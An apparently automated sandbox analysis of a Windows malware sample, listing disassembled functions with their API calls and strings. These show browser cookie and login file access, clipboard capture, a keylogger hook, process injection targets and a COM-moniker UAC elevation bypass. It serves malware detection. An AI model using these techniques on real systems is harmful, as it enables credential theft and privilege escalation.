Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
API String ID: 1164774033-3681987949
Opcode ID: fb0a9c7e55321ac9994998de871ce76ed5923aad06f28dc2a2bb14ae8db906cc
Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
Opcode Fuzzy Hash: fb0a9c7e55321ac9994998de871ce76ed5923aad06f28dc2a2bb14ae8db906cc
Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89

Function 004168C1 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 80clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004168C2
EmptyClipboard.USER32 ref: 004168D0
GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
GlobalFix.KERNEL32(00000000), ref: 004168F9
GlobalUnWire.KERNEL32(00000000), ref: 0041692F
SetClipboardData.USER32(0000000D,00000000), ref: 00416938
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalFix.KERNEL32(00000000), ref: 00416975
GlobalUnWire.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataOpenWire$AllocEmptysend
String ID: !D@
API String ID: 3354723728-604454484
Opcode ID: 52c9240bf4ccc8e9b390544edabc1513392358149995e3768221be602decb17c
Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
Opcode Fuzzy Hash: 52c9240bf4ccc8e9b390544edabc1513392358149995e3768221be602decb17c
Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIcon.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID: Close
API String ID: 1665278180-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Function 0040BD37 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 131fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
FindClose.KERNEL32(00000000), ref: 0040BDC9
FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
FindClose.KERNEL32(00000000), ref: 0040BEAF
FindClose.KERNEL32(00000000), ref: 0040BED0

Strings

[Firefox Cookies not found], xrefs: 0040BDD4, 0040BE9C
\cookies.sqlite, xrefs: 0040BE2C
\AppData\Roaming\Mozilla\Firefox\Profiles\, xrefs: 0040BD52
UserProfile, xrefs: 0040BD60
[Firefox cookies found, cleared!], xrefs: 0040BEDF

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$Close$File$FirstNext
String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 3527384056-432212279
Opcode ID: 6c4fa4754a1f6654b73303a5ed469bc823c884763b50529109860e155fd8415d
Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
Opcode Fuzzy Hash: 6c4fa4754a1f6654b73303a5ed469bc823c884763b50529109860e155fd8415d
Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E

Function 004132D2 Relevance: 18.2, APIs: 12, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Function 0214D7F6 Relevance: 18.1, APIs: 12, Instructions: 74windownativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 0214D841
GetCursorPos.USER32(?), ref: 0214D850
SetForegroundWindow.USER32(?), ref: 0214D859
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0214D873
Shell_NotifyIcon.SHELL32(00000002,00474B48), ref: 0214D8C4
ExitProcess.KERNEL32 ref: 0214D8CC
CreatePopupMenu.USER32 ref: 0214D8D2
AppendMenuA.USER32(00000000,00000000,00000000,0046CF4C), ref: 0214D8E7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID:
API String ID: 1665278180-0
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 82651975584cc4124b0b2db009de93f1a0b8f46ac1266b1d467302c1c5c35aee
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 4D21A37118420AEBDF195F64ED0EA793B65FB09706F004138FA0A950B2DBB1ED61EB58

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E

Strings

ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716
Inj, xrefs: 0040F769
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 8fa5f8ddd2a2d3ffb697a62b2a547acefe36b24beea7d6b82447558531ce044b
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: 8fa5f8ddd2a2d3ffb697a62b2a547acefe36b24beea7d6b82447558531ce044b
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON

Download Yara Rule

Strings

3, xrefs: 00419754
7, xrefs: 0041982A
1, xrefs: 00419695
4, xrefs: 004197B8
VG, xrefs: 0041968B
0, xrefs: 00419651
6, xrefs: 00419813
2, xrefs: 004196F4
5, xrefs: 00419809

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7$VG
API String ID: 0-1861860590
Opcode ID: 08257d2f409e36a676536d6f4fa6555fd6aea9677d206273345d9c2a46a19542
Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
Opcode Fuzzy Hash: 08257d2f409e36a676536d6f4fa6555fd6aea9677d206273345d9c2a46a19542
Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96

Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00407521
CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582

Strings

{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00407516, 0040751B, 0040755A
[+] ucmAllocateElevatedObject, xrefs: 00407508
Elevation:Administrator!new:, xrefs: 00407542
$, xrefs: 0040753B
[-] CoGetObject FAILURE, xrefs: 0040758E
[+] CoGetObject SUCCESS, xrefs: 00407595
[+] CoGetObject, xrefs: 00407561

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA

Function 0214A9AF Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0214A9C5
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0214AA14
GetLastError.KERNEL32 ref: 0214AA22
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0214AA5A

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: be0ddaf329941570a94382f075e84e8113faff717d4b3500a0ac57519a03df9c
Instruction ID: 413ea1ae90bf57d166fdb371b192f6d823e69fe29909cdd441fa3ac78d3344f4
Opcode Fuzzy Hash: be0ddaf329941570a94382f075e84e8113faff717d4b3500a0ac57519a03df9c
Instruction Fuzzy Hash: 11815C71148304AFC716FB20D990AAFB7AABF94714F50082DF596521A0EF74EE48CF96

Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
GetLastError.KERNEL32 ref: 0041A7BB
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: be0ddaf329941570a94382f075e84e8113faff717d4b3500a0ac57519a03df9c
Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
Opcode Fuzzy Hash: be0ddaf329941570a94382f075e84e8113faff717d4b3500a0ac57519a03df9c
Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A

Function 02143539 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0214367E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0214368C
GetFileSize.KERNEL32(?,00000000), ref: 02143699
UnmapViewOfFile.KERNEL32(00000000), ref: 021436B9

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$View$CreateMappingSizeUnmap
String ID:
API String ID: 2708475042-0
Opcode ID: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
Instruction ID: 172efc39ec962b311fcc6f8ff6db3f2548ed18c80161f45d5d92f7cf47a0df5d
Opcode Fuzzy Hash: 52b6b7bb2cc7c70124f03fd4dd600c064b869f903e3e72a7e1b27baf9a98f7f1
Instruction Fuzzy Hash: 5641E171188302BFE7209B24AC49F6F7BACEF85765F200569F529D51E1DB30DA40CAA5

Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

Part of subcall function 00448215: _free.LIBCMT ref: 00448274
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
IsValidCodePage.KERNEL32(00000000), ref: 00452777
IsValidLocale.KERNEL32(?,00000001), ref: 00452786
GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED

Strings

lJD, xrefs: 00452639, 00452649, 00452709, 004526AB, 004526A0, 004526A3, 004526AE, 0045270C
lJD, xrefs: 00452626, 004527C5
lJD, xrefs: 004526F2, 004526E7, 00452745

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: lJD$lJD$lJD
API String ID: 745075371-479184356
Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69

Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
FindClose.KERNEL32(00000000), ref: 0040C47D
FindClose.KERNEL32(00000000), ref: 0040C4A8

Strings

\Mozilla\Firefox\Profiles\, xrefs: 0040C36E
\cookies.sqlite, xrefs: 0040C409
AppData, xrefs: 0040C358

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
API String ID: 1164774033-405221262
Opcode ID: 34afdef0a213279766d94158ec926cdf2bd3b8fd7b5ca6077ae3600bc7783992
Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
Opcode Fuzzy Hash: 34afdef0a213279766d94158ec926cdf2bd3b8fd7b5ca6077ae3600bc7783992
Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D

Function 0214C4F8 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0214C553
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0214C583
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000000), ref: 0214C5F5
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0214C602

Part of subcall function 0214C4F8: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0214C5D8

GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0214C623
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0214C639
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0214C640
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0214C649

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 21adb2039a1719527788488ec41489cbb4979cd8e5b8b9d3f14ea882ba6d989c
Instruction ID: 9a50bb9a946eb15d863cc096e013245c1850a38fd7a3a8138fd02a4fbfd3185f
Opcode Fuzzy Hash: 21adb2039a1719527788488ec41489cbb4979cd8e5b8b9d3f14ea882ba6d989c
Instruction Fuzzy Hash: B231847284121CAADB20DB60DC4CEEE73BDAF04201F0445F6E55AD2061EF35DAC4CEA8

Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B

Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371

GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68

Function 02149D5C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 02149FB2

Part of subcall function 0214C6EC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C705

Strings

PXG, xrefs: 02149F2F
PXG, xrefs: 0214A095
8SG, xrefs: 02149E52
PG, xrefs: 02149E3C
(eF, xrefs: 02149FD4
NG, xrefs: 02149D8C

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CreateFindFirst
String ID: (eF$8SG$PXG$PXG$NG$PG
API String ID: 41799849-875132146
Opcode ID: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
Instruction ID: c48feca5519d004c7a4be5e871293ba4f56bcb55fdb408f9b52d1190bf2df85a
Opcode Fuzzy Hash: bbe42075c7ae05260fcfbdefb5d4915f8db24fce95c41e285dba89f894bfd920
Instruction Fuzzy Hash: 1B814E715882409FC316FB20DD50AEF73ABAFA0340F50492DE95A571E4EF30AE09CE96

Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Strings

PXG, xrefs: 00419CC8
PXG, xrefs: 00419E2E
8SG, xrefs: 00419BEB
PG, xrefs: 00419BD5
NG, xrefs: 00419B25

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: 8SG$PXG$PXG$NG$PG
API String ID: 341183262-3812160132
Opcode ID: 4cce81c52584d29a99eec74df6ef49473cf38274c5faa4e8ca6e5062023e3c07
Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
Opcode Fuzzy Hash: 4cce81c52584d29a99eec74df6ef49473cf38274c5faa4e8ca6e5062023e3c07
Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A

Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
GetLastError.KERNEL32 ref: 0040A2ED

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
TranslateMessage.USER32(?), ref: 0040A34A
DispatchMessageA.USER32(?), ref: 0040A355

Strings

Keylogger initialization failure: error , xrefs: 0040A301

Memory Dump Source

